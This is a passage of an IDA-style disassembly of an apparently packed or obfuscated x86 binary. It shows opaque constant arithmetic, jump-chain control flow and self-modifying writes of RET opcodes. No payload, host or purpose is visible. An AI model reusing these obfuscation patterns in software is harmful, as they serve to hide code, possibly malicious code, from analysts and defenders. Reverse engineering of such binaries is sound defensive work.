		jb	loc_4526CD

loc_4423F5:				; CODE XREF: sub_451634:loc_45A2D8j
		add	edi, 1044D737h
		xchg	edi, [esp+10h+var_10]
		jmp	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_442403:				; CODE XREF: sub_44B814:loc_452706j
					; sub_44B814+D25Bj
		call	sub_43B276
		retn
; ---------------------------------------------------------------------------

loc_442409:				; CODE XREF: sub_44B814+42E0j
					; y2kk37jd:00451280j
		push	esi
		push	724E3C94h
		pop	esi
		jmp	loc_44A0D2
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_442415:				; CODE XREF: y2kk37jd:loc_45A000j
		mov	byte ptr [eax],	0C3h
		jmp	loc_447C6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_44241D:				; CODE XREF: sub_4492F7-56A4j
		call	nullsub_6
		jmp	ds:dword_41E188
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF1D

loc_442428:				; CODE XREF: sub_44DF1D-FE72j
		jmp	loc_43E818
; END OF FUNCTION CHUNK	FOR sub_44DF1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_44242D:				; CODE XREF: sub_44D3D0-FB6Dj
		jmp	loc_458B17
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		xor	al, 24h
		push	esi
		jmp	loc_44C704
; ---------------------------------------------------------------------------
		jmp	ds:off_41E030
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_442441:				; CODE XREF: sub_4411C3-3A1Ej
		jmp	loc_43B497
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_442446:				; CODE XREF: sub_44D6A5:loc_441F16j
					; sub_4447EA:loc_44BCE7j ...
		pop	edx
		jo	loc_43ECE0
		mov	eax, [esp+0]
		jmp	loc_446F78
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D61E

loc_442455:				; CODE XREF: sub_43D61E:loc_44586Aj
		jnz	loc_447C7F
		xor	ebx, eax
		push	esi
		jmp	loc_447C7F
; END OF FUNCTION CHUNK	FOR sub_43D61E
; ---------------------------------------------------------------------------

locret_442463:				; CODE XREF: y2kk37jd:loc_45949Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460D0

loc_442464:				; CODE XREF: sub_4460D0+215Aj
		jmp	loc_4575E2
; END OF FUNCTION CHUNK	FOR sub_4460D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F42

loc_442469:				; CODE XREF: sub_442F42+Bj
		call	sub_4487FD
		push	490AAD7Fh
		pop	eax
		rol	eax, 1Fh
		xor	eax, 4EBFBB03h
		call	sub_44113A
		jmp	loc_44F74F
; END OF FUNCTION CHUNK	FOR sub_442F42
; ---------------------------------------------------------------------------
		push	ebx
		push	6E2D359Eh
		or	ebx, eax
		jmp	loc_447B5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_442494:				; CODE XREF: sub_43F911:loc_45C665j
		add	ecx, 2C1D4465h
		mov	ecx, [ecx]
		or	[ecx+edx], al
		mov	ecx, [ebp-18h]
		and	ecx, 7
		jmp	loc_44D2F1
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_4424AB:				; CODE XREF: sub_4504DD-73B9j
		jmp	loc_441E2D
; END OF FUNCTION CHUNK	FOR sub_4504DD

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4424B0	proc near		; CODE XREF: sub_44CEAB-2A4Cj

; FUNCTION CHUNK AT 0043C6F9 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043EB79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B8A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044EBD4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004541D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004581B0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00458F5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459B5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459C3F SIZE 0000001E BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_458F5A
sub_4424B0	endp

; ---------------------------------------------------------------------------
		db 11h
dword_4424BC	dd 6B47A6C0h		; DATA XREF: sub_440040+4r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4424C0:				; CODE XREF: sub_445226+14BCDj
		jmp	loc_441C54
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C01A

loc_4424C5:				; CODE XREF: sub_45C01A-157C4j
		jmp	loc_45A01A
; END OF FUNCTION CHUNK	FOR sub_45C01A

; =============== S U B	R O U T	I N E =======================================



sub_4424CA	proc near		; CODE XREF: .text:00404516p
					; sub_408DA0+15p
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043EFBD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004430FE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044B1EC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454279 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045695D SIZE 00000005 BYTES

		jo	loc_44B1EC
		mov	eax, ds:dword_45C598
		or	eax, eax
		jnz	loc_445E8E
		jmp	loc_454279
sub_4424CA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_4424E3:				; CODE XREF: sub_44606C:loc_44AE68j
		and	esi, 781869B0h
		cmp	esi, 0A68EAC53h
		jmp	loc_4484AA
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4424F4:				; CODE XREF: sub_4411C3:loc_446778j
					; sub_4411C3+FA25j
		call	sub_45405E
		mov	edx, 8D40711Dh
		push	edx
		push	4B79F279h
		pop	edx
		xor	edx, 92161190h
		jmp	loc_45420B
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_442510:				; CODE XREF: sub_445226+1471Fj
		test	ebx, 7584311Fh
		jmp	loc_44E2EF
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44251B:				; CODE XREF: sub_43ED19+1216j
		xor	ebx, ecx
		jge	loc_45046F
		test	eax, 1ED45297h
		jmp	loc_446EBA
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_44252E	proc near		; DATA XREF: sub_445226:loc_448E41o

; FUNCTION CHUNK AT 00446561 SIZE 00000005 BYTES

		lea	edx, [ebp-14h]
		push	0C92B82A6h
		pop	eax
		add	eax, 0E56CAD86h
		xor	eax, 0CA933F6Fh
		add	eax, 9C39C37Dh
		jmp	loc_446561
sub_44252E	endp

; ---------------------------------------------------------------------------
		xor	esi, ebp
		jmp	sub_442EB4
; ---------------------------------------------------------------------------

loc_442555:				; CODE XREF: y2kk37jd:00458BEAj
		jl	nullsub_427

; =============== S U B	R O U T	I N E =======================================



sub_44255B	proc near		; CODE XREF: sub_44CEAB-4885p

; FUNCTION CHUNK AT 00444AEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B46A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045148D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00452382 SIZE 00000013 BYTES

		xchg	esi, [esp+0]
		pop	esi
		cmp	dword ptr [ebp-4], 0
		jmp	loc_452382
sub_44255B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444DF4

loc_442568:				; CODE XREF: sub_444DF4+Fj
		mov	eax, [ebp+var_4]

loc_44256B:				; CODE XREF: y2kk37jd:0044D879j
		movzx	eax, byte ptr [eax]
		cmp	ds:dword_44FC88[eax*4],	0
		jz	loc_45265D
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0CFh
		jz	loc_452656
		jmp	loc_459E9B
; END OF FUNCTION CHUNK	FOR sub_444DF4
; ---------------------------------------------------------------------------
		xchg	ebp, [ebx]
		jmp	sub_4540F2
; ---------------------------------------------------------------------------

loc_442594:				; CODE XREF: y2kk37jd:004405D4j
		or	ebx, 29223B96h
; START	OF FUNCTION CHUNK FOR sub_45866A

loc_44259A:				; CODE XREF: sub_45866A:loc_4405B6j
		or	edi, 587985DDh

loc_4425A0:				; CODE XREF: y2kk37jd:loc_442711j
		add	edi, 0A2465DF7h
		xchg	edi, [esp+0]
		jmp	sub_43F5BD
; END OF FUNCTION CHUNK	FOR sub_45866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2FD

loc_4425AE:				; CODE XREF: sub_43B2FD+8258j
		jz	loc_45550B
		jmp	loc_456644
; END OF FUNCTION CHUNK	FOR sub_43B2FD
; ---------------------------------------------------------------------------

loc_4425B9:				; CODE XREF: y2kk37jd:004428D6j
		push	0EA1C977Ch

; =============== S U B	R O U T	I N E =======================================



sub_4425BE	proc near		; CODE XREF: sub_43B37E+CB39p

; FUNCTION CHUNK AT 00446E07 SIZE 00000012 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		cmp	dword ptr [eax-1Ch], 0F6h
		jmp	loc_446E07
sub_4425BE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_4425CE:				; CODE XREF: sub_43B8D6+4341j
		jns	loc_441044
		rol	ebp, 19h

loc_4425D7:				; CODE XREF: sub_43B8D6:loc_447668j
		mov	eax, 0DD70DD34h
		call	sub_44113A
		push	edx
		push	538F96B2h
		jmp	loc_44EC62
; END OF FUNCTION CHUNK	FOR sub_43B8D6

; =============== S U B	R O U T	I N E =======================================



sub_4425EC	proc near		; CODE XREF: y2kk37jd:00442E0Cp
					; y2kk37jd:00444FE7j

; FUNCTION CHUNK AT 0043B8F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C70E SIZE 00000001 BYTES

		xchg	edi, [esp+0]
		pop	edi
		call	sub_442C3E
		push	edx
		push	0C61B2A6Eh
		jmp	loc_43B8F4
sub_4425EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442600:				; DATA XREF: y2kk37jd:00445045o
		push	7D7F3094h
		pop	eax
		or	eax, 4DAB0531h
		sub	eax, 6B7D1487h
		and	eax, ds:4000ECh
		jmp	loc_44A7B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B3F

loc_44261D:				; CODE XREF: sub_454B3F+Cj
		add	edi, 8CFDA349h
		sub	edi, 0C8C2C043h
		and	edi, 0FAA7FA05h
		xor	edi, 0D2CF66D2h
		add	edi, 17F61BC8h
		xchg	edi, [esp+4+var_4]
		jmp	loc_45B56F
; END OF FUNCTION CHUNK	FOR sub_454B3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_442643:				; CODE XREF: sub_43BD0D+1307Fj
		mov	ecx, eax
		pop	eax
		ror	eax, 5
		push	esi
		push	8E3CD55Eh
		pop	esi
		jmp	loc_44AB0B
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_442655:				; CODE XREF: sub_44B508:loc_451045j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_448C49
		jmp	loc_43FA10
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_442664:				; CODE XREF: sub_4438B1:loc_447947j
		rol	edx, 6
		mov	edi, esi
		jmp	loc_43B747
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_44266E:				; CODE XREF: sub_4578A6-87CCj
		jno	loc_448F56
		jb	loc_456801
; END OF FUNCTION CHUNK	FOR sub_4578A6
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_44267A:				; CODE XREF: sub_4440AB:loc_440990j
					; sub_43F8B8+40FCj ...
		push	offset loc_44834B
		jmp	nullsub_108
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447423

loc_442684:				; CODE XREF: sub_447423-191Dj
		push	esi
		mov	esi, edi
		call	sub_44DE9F
; END OF FUNCTION CHUNK	FOR sub_447423
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_44268C:				; CODE XREF: sub_44610D+10689j
					; sub_44610D:loc_4592A7j
		xor	eax, eax
		push	offset sub_44DF1D
		jmp	nullsub_269
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_442698	proc near		; DATA XREF: y2kk37jd:0045A2C4o

arg_C		= dword	ptr  10h

		add	esp, 10h
		xchg	eax, [esp-10h+arg_C]
		mov	ebp, eax
		pop	eax
		xor	eax, eax
		retn
sub_442698	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C894

loc_4426A4:				; CODE XREF: sub_44C894+1Cj
		jmp	loc_4416CC
; END OF FUNCTION CHUNK	FOR sub_44C894
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C80

loc_4426AA:				; CODE XREF: sub_448C80+7j
		xchg	ebx, [esp+0]
		nop
		mov	eax, 6FDE1A91h
		push	esi
		push	52D060F7h
		pop	esi
		jmp	loc_45B16E
; END OF FUNCTION CHUNK	FOR sub_448C80
; ---------------------------------------------------------------------------

loc_4426BF:				; DATA XREF: sub_44B4AA+5o
		xchg	edx, [esp]
		mov	eax, edx
		pop	edx
		or	eax, 1BFE3CBCh
		and	eax, 7BB104B8h
		jmp	loc_447D3D
; ---------------------------------------------------------------------------

loc_4426D6:				; CODE XREF: y2kk37jd:004444ACj
		js	loc_45228D
		pop	esi
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_4426DD:				; CODE XREF: sub_440F0C:loc_451E15j
		and	esi, 510E1FBBh
		add	esi, 31890A87h
		js	loc_440B46
; END OF FUNCTION CHUNK	FOR sub_440F0C
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_4426EF:				; CODE XREF: sub_451E9F+Aj
		jmp	loc_44F1DA
; END OF FUNCTION CHUNK	FOR sub_451E9F
; ---------------------------------------------------------------------------
		jge	loc_44C284
		jmp	loc_440B2E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_383. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_442700:				; CODE XREF: y2kk37jd:0043B1BDj
		jge	loc_43DAEC
		jb	loc_456A59
		jmp	loc_44784F
; ---------------------------------------------------------------------------

loc_442711:				; CODE XREF: y2kk37jd:0045B79Fj
		jno	loc_4425A0

; =============== S U B	R O U T	I N E =======================================



sub_442717	proc near		; CODE XREF: sub_44DF1D:loc_4504F1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044623D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045544F SIZE 00000009 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	edx
		lea	eax, [ebp-70h]
		push	eax
		call	dword ptr [ebp-4]
		jmp	loc_44623D
sub_442717	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A36

loc_442728:				; CODE XREF: sub_458A36-176FEj
		jz	loc_43E3AF
		jmp	loc_43DA3E
; END OF FUNCTION CHUNK	FOR sub_458A36
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_442734:				; CODE XREF: sub_44B489-B738j
		jnp	loc_44BA8A
		jnz	loc_44FC46
		jmp	loc_4544BB
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_442745:				; CODE XREF: sub_4507BF+7C05j
		jnz	loc_44C72F
		jmp	loc_454842
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_442750:				; CODE XREF: sub_44346B:loc_4446EAj
					; sub_442376+154FEj
		or	ebp, 3848ECEDh
		sub	ebx, eax
		jmp	loc_45B2CB
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------

loc_44275D:				; CODE XREF: y2kk37jd:00457D0Cj
		js	loc_457AFA
		adc	esi, edx
		jge	loc_4453F7
		not	edx
		jmp	loc_455B90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444180

loc_442772:				; CODE XREF: sub_444180-2799j
		xchg	esi, [esp+4+var_4]
		mov	ecx, esi
		pop	esi
		add	ecx, 6E3734BBh
		cmp	ecx, 0A52B51F2h
		jmp	loc_446199
; END OF FUNCTION CHUNK	FOR sub_444180
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_442789:				; CODE XREF: sub_4408B9+15A27j
					; y2kk37jd:loc_457C72j
		adc	ecx, eax
		jmp	loc_43C4D6
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_442790:				; CODE XREF: sub_43F2F2+6j
		xchg	edx, [esp+0]
		mov	ebp, edx
		pop	edx
		mov	eax, ds:dword_44665C
		jmp	loc_441995
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------

loc_4427A1:				; CODE XREF: y2kk37jd:loc_4561E0j
		jnz	loc_458303
		jmp	loc_45008D
; ---------------------------------------------------------------------------
		mov	ebp, 1DB24B0Eh
		jmp	sub_452ABB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_4427B6:				; CODE XREF: sub_4504DD+7655j
		pop	ebx
		mov	eax, [esp-8+arg_4]
		push	eax
		mov	eax, edx
		xchg	eax, [esp-4+arg_0]
		call	sub_456F0F

loc_4427C5:				; CODE XREF: sub_44B814+1C02j
		jmp	loc_458AD8
; END OF FUNCTION CHUNK	FOR sub_4504DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_4427CA:				; CODE XREF: sub_43ED19+13D2Bj
		jnz	loc_4585AA
		jmp	loc_44F66A
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_4427D5:				; CODE XREF: y2kk37jd:004475DFj
		jbe	loc_457C83
; START	OF FUNCTION CHUNK FOR sub_456990

loc_4427DB:				; CODE XREF: sub_456990:loc_45B888j
		rol	ebx, 1Dh

loc_4427DE:				; CODE XREF: sub_44107E:loc_44D46Aj
		add	ebx, 0EA6969h
		mov	[ebx], eax
		pop	ebx
		lea	eax, loc_458655

loc_4427ED:				; CODE XREF: y2kk37jd:loc_4400BBj
		mov	byte ptr [eax],	0C3h
		jmp	loc_458655
; END OF FUNCTION CHUNK	FOR sub_456990

; =============== S U B	R O U T	I N E =======================================



sub_4427F5	proc near		; CODE XREF: sub_41A3CC+2Ap
					; sub_41A3CC+5Dp ...

; FUNCTION CHUNK AT 0045BBE8 SIZE 00000006 BYTES

		call	sub_45BBF8
		jmp	loc_45BBE8
sub_4427F5	endp

; ---------------------------------------------------------------------------
		and	eax, 527D29F1h
		jmp	sub_4572E5
; ---------------------------------------------------------------------------
		mov	eax, [esp]
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44280D:				; CODE XREF: sub_442A84:loc_456638j
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A45E

loc_442813:				; CODE XREF: sub_45A45E-10422j
		jmp	loc_452928
; END OF FUNCTION CHUNK	FOR sub_45A45E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_442818:				; CODE XREF: sub_44113A-2669j
		jmp	loc_453CCD
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
		db 43h,	32h, 0F0h
dword_442820	dd 0			; DATA XREF: sub_43F346+22w
					; sub_4438B1:loc_44C63Br ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_442824:				; CODE XREF: sub_43F346+450Cj
		jmp	loc_44CE27
; END OF FUNCTION CHUNK	FOR sub_43F346

; =============== S U B	R O U T	I N E =======================================



sub_442829	proc near		; CODE XREF: sub_417ADF+52p
					; DATA XREF: jlrllt49:off_41E00Co

; FUNCTION CHUNK AT 0043BA87 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E255 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440620 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004407D1 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00448908 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D55 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E238 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E8E2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450BD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D19 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045624B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045735F SIZE 00000021 BYTES

		jb	loc_4407E9
		mov	eax, ds:dword_45B410
		jmp	loc_44E8E2
sub_442829	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 320057C2h
		call	sub_44113A
		mov	ds:off_41E018, eax
		lea	eax, sub_4430DD
		jmp	loc_450573
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_442855:				; CODE XREF: sub_44610D:loc_450A59j
		jz	loc_454391
		jmp	loc_452022
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_442860:				; CODE XREF: sub_43C054-B8Ej
		jnz	loc_43B13A
		jmp	loc_45A93E
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_44286B:				; CODE XREF: sub_44DBF8+18j
		jnz	loc_43EE42

loc_442871:				; CODE XREF: sub_451964+3B6Fj
		jmp	loc_44E657
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; ---------------------------------------------------------------------------

loc_442876:				; CODE XREF: y2kk37jd:00448C44j
		jmp	loc_44CF7E
; ---------------------------------------------------------------------------
		xchg	eax, [edx]
		add	ebp, esi
		jmp	loc_43EE42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CC2

loc_442884:				; CODE XREF: sub_446CC2+10j
		push	offset loc_44A0EF
		jmp	nullsub_515
; END OF FUNCTION CHUNK	FOR sub_446CC2
; ---------------------------------------------------------------------------

loc_44288E:				; CODE XREF: y2kk37jd:loc_44FB78j
		and	edi, 0C7A8D508h
		test	edi, 800h
		jmp	loc_43FDA5

; =============== S U B	R O U T	I N E =======================================



sub_44289F	proc near		; CODE XREF: sub_43F346+51p
					; y2kk37jd:0044898Cj

; FUNCTION CHUNK AT 00442387 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A212 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044EB34 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004557B5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457596 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459F87 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A1ED SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		cmp	byte ptr [eax],	0F1h
		jnz	loc_459F8C
		jmp	loc_45A1ED
sub_44289F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_43BD7A
; ---------------------------------------------------------------------------
		call	sub_458775
; START	OF FUNCTION CHUNK FOR sub_454942

loc_4428BB:				; CODE XREF: sub_454942+7j
		jmp	sub_45405E
; END OF FUNCTION CHUNK	FOR sub_454942
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4428C0:				; CODE XREF: sub_45B7AA-16F8Aj
		jmp	loc_45BEF5
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4428C5:				; CODE XREF: sub_4448E2:loc_44B60Ej
		jz	loc_44CD13
		jmp	loc_443D9C
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		add	edx, 705F795Bh
		jmp	loc_4425B9
; ---------------------------------------------------------------------------
		cmp	eax, edi

loc_4428DD:				; CODE XREF: y2kk37jd:0043CFD8j
		jmp	loc_44FBF0
; ---------------------------------------------------------------------------

loc_4428E2:				; CODE XREF: y2kk37jd:loc_457879j
					; y2kk37jd:0045BFDDj
		add	eax, 45AE0EECh
		push	ebx
		pushf
		push	49A4D557h
		jmp	loc_44D199
; ---------------------------------------------------------------------------
		push	ebp
		shr	ecx, 2
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4428F8:				; CODE XREF: sub_43C851:loc_44B07Fj
		jmp	sub_4441FF
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_4428FD:				; CODE XREF: sub_43BD0D+C6E5j
		push	0ECBA1EDCh
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		or	edx, 0D586D778h
		add	edx, 41BD5552h
		add	eax, edx
		jmp	loc_452681
; END OF FUNCTION CHUNK	FOR sub_43BD0D

; =============== S U B	R O U T	I N E =======================================



sub_44291B	proc near		; CODE XREF: y2kk37jd:00441754j
					; y2kk37jd:0045C660p

; FUNCTION CHUNK AT 00449E2D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453FE9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004599DF SIZE 00000018 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_440CD1
		call	sub_45405E
		mov	edx, 30DFC367h
		call	sub_440CD1
		jmp	loc_4599DF
sub_44291B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_442938	proc near		; CODE XREF: sub_456A36+4CDj
					; sub_456809+51BDp

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440398 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00445124 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044567B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004480FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A129 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B159 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C46E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456A9B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A905 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045B941 SIZE 0000000C BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_440398
sub_442938	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_442943:				; CODE XREF: sub_4429DD:loc_446826j
		jz	loc_451879
		jmp	loc_443A6A
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
		jb	loc_441908
		cmp	edx, 0FCBA4C0Dh
		jmp	loc_43C32F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446303

loc_44295F:				; CODE XREF: sub_446303:loc_447F2Fj
		cmp	ecx, 9512718Eh
		jmp	loc_4556EE
; END OF FUNCTION CHUNK	FOR sub_446303
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44977F

loc_44296A:				; CODE XREF: sub_44977F:loc_44A6B0j
		mov	ds:dword_4470E0, eax
; END OF FUNCTION CHUNK	FOR sub_44977F
; START	OF FUNCTION CHUNK FOR sub_44E4A5

loc_44296F:				; CODE XREF: y2kk37jd:loc_44017Bj
					; sub_451F6F-3ACFj ...
		mov	eax, ds:dword_4470E0
		call	sub_4526B7

loc_442979:				; CODE XREF: sub_458A74:loc_43D52Aj
		mov	esp, ebp
		pop	ebp
		push	ds:dword_4470E0
		retn
; END OF FUNCTION CHUNK	FOR sub_44E4A5
; ---------------------------------------------------------------------------

